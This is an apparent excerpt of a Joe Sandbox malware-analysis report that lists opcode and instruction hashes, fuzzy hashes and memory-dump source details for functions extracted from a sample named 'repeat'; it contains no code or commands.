                                                                                • Opcode Fuzzy Hash: 9fd25c135af1376169eecbd93637deeea2750931105f8d5bc78dc69610065138
                                                                                • Instruction Fuzzy Hash: D711C130AA02068BEF655A7CD45437E37E5FB81210F904939F402DF6D2CA28CC468BD5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41e023136e5014bdffc8f6bb29422cfb48b2a88dec6238b800da7bb59465087
                                                                                • Instruction ID: 9f6faa10d1f701de27860ea3fdedf8c1cf60be6b4ee6ac81c6ffbc7175ac5391
                                                                                • Opcode Fuzzy Hash: a41e023136e5014bdffc8f6bb29422cfb48b2a88dec6238b800da7bb59465087
                                                                                • Instruction Fuzzy Hash: 0611C130BA02068BEF656B7DD44472E36D5FF45210FA04938F006CF2E2DA28CC458BC5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23a25d1659450c12d85aacdf72d02174b8e0741322f3d5be5aa8935cc60148d5
                                                                                • Instruction ID: 31de0fe587a801122271bc1f8df479500e7514c8f3eedb685d9458a0910a5182
                                                                                • Opcode Fuzzy Hash: 23a25d1659450c12d85aacdf72d02174b8e0741322f3d5be5aa8935cc60148d5
                                                                                • Instruction Fuzzy Hash: 13115231A406168FCF25EFBC94901AD7BF5FF99250F5404BAE94AEF241E735C8428BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211077381.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_155d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction ID: 7b4b68845aba2641c83d8baeb81a15072da229b8747e9e0916d74af511e568d8
                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction Fuzzy Hash: C811A9765042848FDB12CF54C9D4B19BBB2FB84214F24C6AADC494F262C33AD44ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7e5a4c3bbf350393881da8b5d36a8d6b9f36493ce6c02e5ae69f70e41b07bf0c
                                                                                • Instruction ID: 1af8830bb2d6e311d7bde2484f620388acc99f4a2344fee7c81bde56110bb3ed
                                                                                • Opcode Fuzzy Hash: 7e5a4c3bbf350393881da8b5d36a8d6b9f36493ce6c02e5ae69f70e41b07bf0c
                                                                                • Instruction Fuzzy Hash: B7018031A407168FCB21EFBC84801AD7BF9FF88210F540479E90AEF241E735D8418BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d9d9a085199cd3b9fd726785af16561c02459bd18ca75cc7128b66418975595
                                                                                • Instruction ID: d6683e7ddf0d02f49de7664aaf460f116e1255c4a50ef6efb99279f4fb395001
                                                                                • Opcode Fuzzy Hash: 8d9d9a085199cd3b9fd726785af16561c02459bd18ca75cc7128b66418975595
                                                                                • Instruction Fuzzy Hash: 1F010430A001058FDB04DF98E984B8EBFBAFF84310FA48274C8485F2A9D770E906C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc615db874d060064cc454b8e4a4144ec20365fc392ca5363a94b4b34efe52d3
                                                                                • Instruction ID: f0b72743624dd9ac21aaa7cb8a9c6fa24fa0fcc860a6de8b2fb52d66c24b14b9
                                                                                • Opcode Fuzzy Hash: cc615db874d060064cc454b8e4a4144ec20365fc392ca5363a94b4b34efe52d3
                                                                                • Instruction Fuzzy Hash: 22012834B80214CFD715DBB9D568B6C77B2FB88715FA104A9E5069B3A0CB35AD82CB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05d0e66ea8cb7af6d4371c58bd15348a6f23cbc9894aacce573b871f19158e57
                                                                                • Instruction ID: 4b195cc52a6d668dc9e67c2a44fb6f0647d63fabd42ca502de3d221c1b9a43bf
                                                                                • Opcode Fuzzy Hash: 05d0e66ea8cb7af6d4371c58bd15348a6f23cbc9894aacce573b871f19158e57
                                                                                • Instruction Fuzzy Hash: 6A018F309402499FDB05FFB8F99099C7FB5EF80204F5046B9C449AB275DB395E0ACB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4bf36be0554e88bca73696b11a7276031cc29d8c5233d6fd1c7e11d1d5f0094
                                                                                • Instruction ID: 14aef692c87f7226b95f165b697668e2fcdb3e8c4ee05897fee33a7e35a036b2
                                                                                • Opcode Fuzzy Hash: b4bf36be0554e88bca73696b11a7276031cc29d8c5233d6fd1c7e11d1d5f0094
                                                                                • Instruction Fuzzy Hash: 46F0F033A445108FDB228BB898D01ACBBA5FFAD111B9C40E7D887EF252E325D402CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 589323d2aaaccd93189846807316fb2d581e00cd6eebdd59f1284ed7a6e90e9d
                                                                                • Instruction ID: 3d688c7ffcd9c95ddb710a9fb761d7120dfbe60cf0edacdb0a167709c16848a7
                                                                                • Opcode Fuzzy Hash: 589323d2aaaccd93189846807316fb2d581e00cd6eebdd59f1284ed7a6e90e9d
                                                                                • Instruction Fuzzy Hash: 2BF0CD709401099FDB45FFB4F94499DBBB9EF80604F504679C409AB274DB396E09CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 39530fda83313cfe839fc08453e2461be85e1593cdbab255e005ef35f54bcf0d
                                                                                • Instruction ID: f9697d5a55d4a707fa4e745825012bb2b345410d0b3d02df463b658e544ce740
                                                                                • Opcode Fuzzy Hash: 39530fda83313cfe839fc08453e2461be85e1593cdbab255e005ef35f54bcf0d
                                                                                • Instruction Fuzzy Hash: 31B09B3700010D5E47417F80EC01C45BBADBB942407009051A6084A031D521D564D755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%